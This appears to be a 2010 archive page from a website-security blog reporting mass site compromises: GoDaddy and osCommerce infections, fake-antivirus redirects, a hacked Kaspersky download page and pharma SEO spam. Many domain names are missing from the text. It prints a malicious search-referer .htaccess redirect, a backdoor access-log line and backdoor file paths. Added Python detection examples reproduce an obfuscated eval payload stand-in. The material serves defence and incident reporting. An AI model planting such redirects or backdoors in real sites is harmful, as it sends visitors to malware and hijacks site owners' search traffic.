Archives for October 2010

Attacks on GoDaddy sites –

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.

Just a quick update to this blog post: More Attacks –

We posted a few days ago that attackers were using to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using

The following domains/IP addresses are being used to spread the attack:


Hilary Kneber at it again:

The Hilary Kneber group is at it again. We are now tracking their usage of to push malware to quite a few sites. If you don’t know about them, just take a look at our blog history. Most of the mass attacks we posted were controlled and created by them.

All the infected sites have this malware:

<script src="”..

Which is generated by a large string of encoded PHP added to all files in a site. If your site got hacked, we have a clean up solution here: Some details here too: MW:GDD:3.

The above code loads malware from, which is hosted at (from – famous fake AV site).

And the whois for

Domain name:
Registrant Contact:
HardSoft, inc
Hilary Kneber
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947

Administrative Contact:
Hilary Kneber
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947

This IP is hosted, which was also the home of recent attacks:

We will post more details when we get them.

Is your site hacked? Visit and we will clean up the mess for you.

Malware update:

Quick malware update: The site (nice name) is being used to distribute SEO spam and malware (the famous fake AV). We recently wrote about the domain ssl-validation, but it seems that they disabled it and are using ssl-verification instead now.

You can get details of the code being used here: 7ea73e3ac775b52b945d5b45a5abb7ad and b99003ddc4a4815bb82a39cc6af3b452

All the infected sites so far had an encoded piece of PHP code inside their index.php or footer.php (if using WordPress) and a backdoor inside a random PHP file. We found the backdoor and, by analyzing the logs, we could find the C&C IP address:

– – [20/Oct/2010:03:35:21 -0700] “GET /img/readthat.php HTTP/1.1” 200 11204 “” “Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10”
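The log entry above is how the backdoor's caller was found: a request for a PHP script in a directory that should only hold images. Below is an added example (not code from the original post) that automates the same check over an Apache combined-format access log. The sample lines are constructed for this example; only the /img/readthat.php path and the Opera user-agent string come from the post, and the IP addresses are from the RFC 5737 documentation range rather than the real C&C address, which the post does not reproduce here.

```python
import re

# Constructed sample log lines in Apache "combined" format. Two hits on the
# backdoor from one client, plus ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Oct/2010:03:35:21 -0700] "GET /img/readthat.php HTTP/1.1" 200 11204 "" "Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10"
198.51.100.7 - - [20/Oct/2010:03:36:02 -0700] "GET /index.php HTTP/1.1" 200 5120 "http://www.example.com/" "Mozilla/5.0"
203.0.113.5 - - [20/Oct/2010:03:37:45 -0700] "POST /img/readthat.php?c=1 HTTP/1.1" 200 88 "" "Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10"
198.51.100.7 - - [20/Oct/2010:03:38:10 -0700] "GET /img/logo.png HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0"
"""

# One regex for the combined log format: client, timestamp, request line,
# status, size, referer and user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directories that normally serve only static assets on a PHP site. A .php
# request under one of these is the pattern the post describes.
STATIC_DIRS = ("/img/", "/images/", "/css/", "/js/", "/uploads/")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_backdoor_hits(log_text):
    """Return {client_ip: {requests, paths, agents}} for every request to a
    PHP script under a static-asset directory."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string
        if not (path.lower().endswith(".php") and path.startswith(STATIC_DIRS)):
            continue
        entry = hits.setdefault(rec["ip"], {"requests": 0, "paths": set(), "agents": set()})
        entry["requests"] += 1
        entry["paths"].add(path)
        entry["agents"].add(rec["ua"])
    # Convert the sets to sorted lists so the result is stable and printable.
    return {
        ip: {"requests": e["requests"], "paths": sorted(e["paths"]), "agents": sorted(e["agents"])}
        for ip, e in hits.items()
    }


if __name__ == "__main__":
    for ip, info in find_backdoor_hits(SAMPLE_LOG).items():
        print(ip, info["requests"], "request(s) to", ", ".join(info["paths"]))
```

On a real server, feed the function the contents of the access log (or pipe a `grep '\.php'` pre-filter into it) and extend STATIC_DIRS to match the site's layout; every IP it returns is a candidate for the controlling host and for a firewall block.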

What is interesting is that it seems the attackers are using to manage their network of infected sites and according to Google, they have more than 4k sites under their control.

The malicious site is hosted at, so suggestion for hosting companies: Block this IP.

Having issues with malware? Sign up at and we will get it all sorted out.

More attacks – Hilary Kneber and

For the last couple of days, we’ve been seeing a good number of sites hacked with a familiar pattern. All of them have a javascript loading malware (the famous fake AV) from:

This is very similar to the GoDaddy attack of a few weeks ago, but this time it’s affecting other hosting providers.

All the sites we’ve seen so far have the following code added to all PHP files:


What is interesting is that this site is hosted at, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related (even though this domain wasn’t registered in their name).


NASA web site hacked and serving malware/spam

Some sites under NASA’s Jet Propulsion Lab ( ) have been hacked and are being used on the infamous blackhat SEO spam network. Not only that, but they are also serving malware to unsuspecting users.

The sites in question are, and a few others. Most of these malicious pages are well hidden in the site, for example at

NASA with spam

You can also search on google for “cialis canada” to find a few more pages and sites infected:


Kaspersky site hacked and redirecting users to fake AV

If you tried to download from and/or visit Kaspersky’s web site yesterday, please check that your computer didn’t get infected. Their web site was hacked and their download pages were redirecting users to a fake AV (malware) page.

The malware was getting loaded from, which is already blacklisted by Google:

Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, appeared to function as an intermediary for the infection of 46 site(s) including,,

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1941 domain(s), including,,

Users are complaining about it in their forums, but Kaspersky has not released an official statement about it:

Update: Kaspersky confirmed the incident to

It shows that even security companies are not immune from these types of attacks. Hopefully they will post an update soon.

Rail Europe trying to sell me Amoxicillin – Pharma hack

I was looking to buy some Amoxicillin online today and didn’t want to get a prescription. So I went to Google and searched for it. Interestingly enough, Rail Europe ( ) was the first result.

Ok, so I’m kidding, I was not searching for Amoxicillin. I was however being truthful about Rail Europe being hacked with the infamous Blackhat SEO Spam (pharma) technique.

Infecting sites with ads for medicine to treat infections, how awesome is that?

Pharma hack


osCommerce attacks –

We are seeing a very large number of osCommerce sites hacked in the last few days. If you are an osCommerce user, make sure to update it ASAP and check to see if it has been infected (also remove file_manager.php from the admin directory).

These attacks seem to be using the same vulnerability used in previous attacks (,, etc).

The latest version consists of the following:

1 .htaccess is modified to redirect users to,,, etc (just the first domain infected more than 600 sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteRule ^(.*)$ [R=301,L]

2 A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO SPAM is added to includes/application_bottom.php.
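The three changes listed above (a referer-gated redirect in .htaccess, backdoor files at known paths, and injected code in a core PHP file) can all be checked for mechanically. The following is an added example, not the Sucuri scanner or osCommerce code, of a small site scanner that looks for each of them. It runs over an in-memory file tree constructed for this example; the redirect target http://redirect-target.invalid/ is a placeholder standing in for the domains the post does not name here, and the eval(base64_decode(...)) line is a constructed stand-in for the "large string of encoded PHP" described in the earlier posts on this page, which the same check covers.

```python
import re

# --- .htaccess: redirect that fires only for search-engine visitors -----------
# A RewriteCond on %{HTTP_REFERER} naming a search engine ...
SEARCH_ENGINE_REFERER = re.compile(
    r'RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(google|yahoo|ask|bing|msn|aol)', re.I)
# ... followed by a RewriteRule whose target is an absolute URL or carries an R flag.
REWRITE_RULE = re.compile(r'RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?', re.I)
REDIRECT_FLAG = re.compile(r'(^|,)\s*R(=\d+)?\s*(,|$)', re.I)

# --- files: backdoor paths named in the post, and obfuscated eval payloads ----
KNOWN_BACKDOOR_PATHS = ("js/conf.php", "flops.php", "admin/file_manager.php")
ENCODED_PHP = re.compile(
    r'\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I)


def find_referer_cloaking(htaccess_text):
    """Return the RewriteRule lines that are conditioned on a search-engine referer."""
    hits = []
    referer_conds = 0
    for line in htaccess_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if SEARCH_ENGINE_REFERER.search(stripped):
            referer_conds += 1
            continue
        m = REWRITE_RULE.search(stripped)
        if not m:
            continue  # other directives do not break a RewriteCond chain
        target, flags = m.group(2), m.group(3) or ""
        if referer_conds and (target.lower().startswith("http") or REDIRECT_FLAG.search(flags)):
            hits.append(stripped)
        referer_conds = 0  # a RewriteRule consumes the conditions before it
    return hits


def scan_site(files):
    """files: {relative_path: content}. Returns sorted (path, reason) findings."""
    findings = []
    for path, content in files.items():
        if path.endswith("/.htaccess") or path == ".htaccess":
            for rule in find_referer_cloaking(content):
                findings.append((path, "referer-gated redirect: " + rule))
        if any(path == k or path.endswith("/" + k) for k in KNOWN_BACKDOOR_PATHS):
            findings.append((path, "known backdoor path"))
        elif path.endswith(".php") and ENCODED_PHP.search(content):
            findings.append((path, "obfuscated eval payload"))
    return sorted(findings)


# Constructed sample tree: one tampered catalog plus clean files.
MALICIOUS_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteRule ^(.*)$ http://redirect-target.invalid/ [R=301,L]
"""
BENIGN_HTACCESS = """Options -Indexes
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""
SAMPLE_SITE = {
    "catalog/.htaccess": MALICIOUS_HTACCESS,
    "catalog/images/.htaccess": BENIGN_HTACCESS,
    "catalog/js/conf.php": "<?php /* constructed stand-in for the dropped backdoor */ ?>",
    "catalog/flops.php": "<?php /* constructed stand-in for the dropped backdoor */ ?>",
    "catalog/includes/application_bottom.php":
        "<?php\n// ... original code ...\neval(base64_decode('aGVsbG8='));\n",
    "catalog/index.php": "<?php require('includes/application_top.php'); ?>",
}

if __name__ == "__main__":
    for path, reason in scan_site(SAMPLE_SITE):
        print(path, "->", reason)
```

To run it against a real install, build the dict by walking the document root (os.walk) and reading each .htaccess and .php file; anything it reports under "known backdoor path" or "obfuscated eval payload" should be compared against a clean copy of the osCommerce release before deleting it, since the eval check will also flag some legitimate obfuscated plugins.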

All the domains used in this attack are hosted at

This is how our malware scanner detects an infected site:

OsCommerce hacked

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.

If your site is hacked and you need help, contact us a or

More attacks – Hilary Kneber and meqashoppecom – Part II

A few days ago we reported a large scale attack affecting WordPress sites at hosted on 123-reg servers. They were using the domains and meqashopperonline.ccom to spread the malware. You can read more about it here.

Today, we’re seeing a small variation of this attack. We’re continuing our research, but it seems the attack has spread to another host, and maybe more. The attackers are using to spread the malware and the following javascript gets added to the affected sites (result from our scanner):

Please protect your forum or shut it down

A note to Please protect your forums or shut it down.

Not only are more than half of the posts ( serving SPAM, they are also being used to affect other web sites. More often than not, when a site gets hacked with SEO Spam, we see links like this one (pointing to

purchasing   viagra  overnight &nbsp – Tramadol and pregnancy (

The main page of the forum is all serving spam (see the recent posts tab):
